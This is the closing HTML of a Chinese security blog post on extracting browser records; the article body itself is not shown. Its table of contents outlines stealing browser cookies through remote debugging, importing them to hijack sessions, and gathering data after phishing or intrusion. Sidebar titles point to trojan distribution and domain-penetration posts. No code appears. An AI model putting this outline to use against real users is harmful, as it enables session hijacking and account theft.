</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="http://example.com">plague</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="http://example.com/google/f2274642.html">http://example.com/google/f2274642.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://example.com" target="_blank">Plague</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集</a><a class="post-meta__tags" href="/tags/%E6%B5%8F%E8%A7%88%E5%99%A8%E8%AE%B0%E5%BD%95%E6%8F%90%E5%8F%96/">浏览器记录提取</a></div><div class="post_share"><div class="social-share" data-image="https://picsum.photos/300/200/?random=3" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/google/509c1a02.html" title="自动区分系统分发木马"><img class="cover" src="https://picsum.photos/300/200/?random=2" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">自动区分系统分发木马</div></div></a></div><div class="next-post pull-right"><a href="/google/e9dbc322.html" title="如何快速检索最新的高可用漏洞"><img class="cover" src="https://picsum.photos/300/200/?random=2" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">如何快速检索最新的高可用漏洞</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/logo.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">plague</div><div class="author-info__description">世界是一个巨大的草台班子</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">6</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">9</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">4</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://www.xxx.com"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">号外号外～～～</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#mac%E4%BD%BF%E7%94%A8%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">mac使用远程调试：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E8%BF%9C%E7%A8%8B%E8%B0%83%E8%AF%95"><span class="toc-number">1.1.</span> <span class="toc-text">启动远程调试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E6%B5%8F%E8%A7%88%E5%99%A8%E7%8E%B0%E6%9C%89%E7%9A%84cookie"><span class="toc-number">1.2.</span> <span class="toc-text">获取浏览器现有的cookie</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%A8Simple-WebSocket-Client%E6%8F%92%E4%BB%B6%E6%9D%A5%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.2.1.</span> <span class="toc-text">用Simple WebSocket Client插件来实现</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%94%A8python%E8%84%9A%E6%9C%AC%E6%9D%A5%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.2.2.</span> <span class="toc-text">用python脚本来实现</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8Cookie-Editor%E6%B7%BB%E5%8A%A0%E6%89%80%E9%9C%80%E7%9A%84cookie%EF%BC%8C%E7%84%B6%E5%90%8E%E5%B0%B1%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E6%93%8D%E4%BD%9C%E4%BA%86"><span class="toc-number">1.3.</span> <span class="toc-text">使用Cookie Editor添加所需的cookie，然后就可以直接操作了</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%87%AA%E5%8A%A8%E5%8C%96%E9%92%93%E9%B1%BC%E6%88%96%E8%80%85%E5%85%A5%E4%BE%B5%E5%90%8E%E7%9A%84%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.4.</span> <span class="toc-text">自动化钓鱼或者入侵后的信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%92%93%E9%B1%BC%E7%9A%84%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.4.1.</span> <span class="toc-text">钓鱼的思路：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%9A%84%E6%80%9D%E8%B7%AF%EF%BC%9A"><span class="toc-number">1.4.2.</span> <span class="toc-text">信息收集的思路：</span></a></li></ol></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/google/cdeaf865.html" title="域渗透一条龙命令集合"><img src="https://picsum.photos/300/200/?random=1" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="域渗透一条龙命令集合"/></a><div class="content"><a class="title" href="/google/cdeaf865.html" title="域渗透一条龙命令集合">域渗透一条龙命令集合</a><time datetime="2024-09-19T15:04:04.000Z" title="发表于 2024-09-19 23:04:04">2024-09-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/google/509c1a02.html" title="自动区分系统分发木马"><img src="https://picsum.photos/300/200/?random=2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="自动区分系统分发木马"/></a><div class="content"><a class="title" href="/google/509c1a02.html" title="自动区分系统分发木马">自动区分系统分发木马</a><time datetime="2024-09-19T14:55:19.000Z" title="发表于 2024-09-19 22:55:19">2024-09-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/google/f2274642.html" title="全平台浏览器记录提取"><img src="https://picsum.photos/300/200/?random=3" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="全平台浏览器记录提取"/></a><div class="content"><a class="title" href="/google/f2274642.html" title="全平台浏览器记录提取">全平台浏览器记录提取</a><time datetime="2024-09-19T14:31:29.000Z" title="发表于 2024-09-19 22:31:29">2024-09-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/google/e9dbc322.html" title="如何快速检索最新的高可用漏洞"><img src="https://picsum.photos/300/200/?random=2" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="如何快速检索最新的高可用漏洞"/></a><div class="content"><a class="title" href="/google/e9dbc322.html" title="如何快速检索最新的高可用漏洞">如何快速检索最新的高可用漏洞</a><time datetime="2024-09-19T14:10:24.000Z" title="发表于 2024-09-19 22:10:24">2024-09-19</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/google/a0eb40eb.html" title="漏洞poc快速查找利用"><img src="https://picsum.photos/300/200/?random=3" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="漏洞poc快速查找利用"/></a><div class="content"><a class="title" href="/google/a0eb40eb.html" title="漏洞poc快速查找利用">漏洞poc快速查找利用</a><time datetime="2024-09-19T13:56:11.000Z" title="发表于 2024-09-19 21:56:11">2024-09-19</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('https://picsum.photos/300/200/?random=3')"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2024 By plague</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js?v=4.13.0"></script><script src="/js/main.js?v=4.13.0"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.33/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"></div><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.3/dist/fireworks.min.js"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>